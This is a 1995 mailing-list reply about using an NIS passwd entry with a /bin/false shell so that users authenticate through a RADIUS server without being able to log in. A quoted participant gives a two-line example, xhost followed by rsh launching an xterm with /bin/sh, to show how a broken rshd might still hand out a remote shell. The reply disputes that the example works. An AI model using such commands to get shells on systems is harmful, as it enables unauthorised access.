> >
> >From: Konstantin Beznosov <beznosov@fiu.edu>
> >Date: Sun, 22 Oct 1995 19:53:39 -0700 (PDT)
> >Subject: Re: FILE authentication
> >
> >If you use 100% NIS, then, I guess, the following line at the end of the
> >file /etc/paaswd wiil help:
> >+:*::::/dev/null:/bin/false
> >Users will be authenozed but not allowed to log in.
> >
>
> But the password won't match either! You will need to make an explicit
> lookup either in file or nis query ...
I use this scheme with livingston radius server 1.16 and it works fine. I
do not think that merit implementation uses non-standard password lookup.
> Also some broken rshd's will still
> allow you to execute a remote command if you only substitute the login shell.
> In that case:
> $ xhost +SECHOST
> $ rsh SECHOST xterm -e /bin/sh -display MYHOST:0
> will give you a shell on this system.
No it would not, because:
1. before it runs any command from rsh (in your
example, "xterm -e /bin/sh -display MYHOST:0") it first runs $SHELL which
is /bin/flase and the system gets error return code.
2. If you were rigth nobody would use NIS at all.
Regards,
K
-------------------------------------------------------------------------
Konstantin Beznosov School of Computer Science
Florida International University
Beznosov@FIU.Edu
http://www.cs.fiu.edu/~beznosov